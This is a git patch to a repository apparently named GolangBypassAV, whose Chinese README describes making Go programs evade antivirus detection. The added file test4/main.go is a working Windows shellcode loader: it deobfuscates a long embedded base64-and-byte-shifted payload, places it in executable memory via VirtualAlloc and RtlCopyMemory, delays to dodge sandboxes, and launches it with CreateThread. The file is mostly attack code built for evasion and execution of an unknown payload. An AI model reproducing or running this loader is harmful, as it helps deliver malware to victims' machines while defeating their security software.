From 0a6ef26000db1c6791e700ffd748681f746c435a Mon Sep 17 00:00:00 2001 From: Administrator <1850597152@qq.com> Date: Sun, 15 Aug 2021 19:25:41 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0CreateThread?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 12 ++--- test3/main.go | 3 +- test4/main.go | 123 ++++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 130 insertions(+), 8 deletions(-) create mode 100644 test4/main.go diff --git a/README.md b/README.md index de36687..cb0e3da 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # GolangBypassAV 研究利用golang来bypassAV -## 说明 +## 前言 免杀这块本来就不是web狗擅长的,而且作为一个web狗也没必要花太多时间来折腾这个,达到能用就行,不要追求全部免杀,能免杀目标就行。 @@ -9,12 +9,10 @@ 静态免杀比较简单,可选加密payload或者分离payload。 分离免杀效果比加密payload的效果要好。 -## 目录介绍 -- hello -golang的demo。hello world 也有5个报毒。 - -- test1 -随手抄了一个加密payload出来。效果一般。 +## 说明 +test1、test2效果还可以。 + + diff --git a/test3/main.go b/test3/main.go index b6e2c9d..f4e2f5a 100644 --- a/test3/main.go +++ b/test3/main.go @@ -128,7 +128,8 @@ func getFileShellCode1(file string) string { } func main() { - //用了virtualProtect没什么明显提升,还是7个 + //用了virtualProtect没什么明显提升,还是7个。 + //virtualProtect传参还有点问题,待修复。 //fmt.Println(1) diff --git a/test4/main.go b/test4/main.go new file mode 100644 index 0000000..999fc53 --- /dev/null +++ b/test4/main.go @@ -0,0 +1,123 @@ +package main + +import ( + "GolangBypassAV/encry" + "encoding/base64" + "fmt" + "os" + "syscall" + "time" + "unsafe" +) + +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + +var kk = []byte{0x11} + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + CreateThread = kernel32.MustFindProc("CreateThread") + + RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") +) + +func base64Decode(data string) []byte { + data1, _ := base64.StdEncoding.DecodeString(data) + return data1 +} + +func base64Encode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + return bdata +} + +func getEnCode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + + bydata := []byte(bdata) + var shellcode []byte + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]+kk[0]) + } + return base64.StdEncoding.EncodeToString(shellcode) +} + +func getDeCode(string2 string) []byte { + + ss, _ := base64.StdEncoding.DecodeString(string2) + string2 = string(ss) + var shellcode []byte + + bydata := []byte(string2) + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]-kk[0]) + } + ssb, _ := base64.StdEncoding.DecodeString(string(shellcode)) + return ssb + +} + +func checkError(err error) { + if err != nil { + if err.Error() != "The operation completed successfully." { + println(err.Error()) + os.Exit(1) + } + } +} + +func genEXE(charcode []byte) { + + addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) + if err != nil && err.Error() != "The operation completed successfully." { + syscall.Exit(0) + } + _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) + if err != nil && err.Error() != "The operation completed successfully." { + syscall.Exit(0) + } + time.Sleep(5 * time.Second) + //syscall.Syscall(addr, 0, 0, 0, 0) + CreateThread.Call(0, 0, addr, 0, 0, 0) +} + +func gd() int64 { + time.Sleep(time.Duration(2) * time.Second) + + dd := time.Now().UTC().UnixNano() + return dd + 123456 + +} + +func getFileShellCode(file string) []byte { + data := encry.ReadFile(file) + //shellCodeHex := encry.GetBase64Data(data) + //fmt.Print(shellCodeHex) + return data +} + +func getFileShellCode1(file string) string { + data := encry.ReadFile(file) + shellCodeHex := base64Encode(data) + fmt.Print(shellCodeHex) + return shellCodeHex +} + +func main() { + //fmt.Println(1) + + //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin"))) + + bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg==" + shellCodeHex := getDeCode(bbdata) + gd() + genEXE(shellCodeHex) +}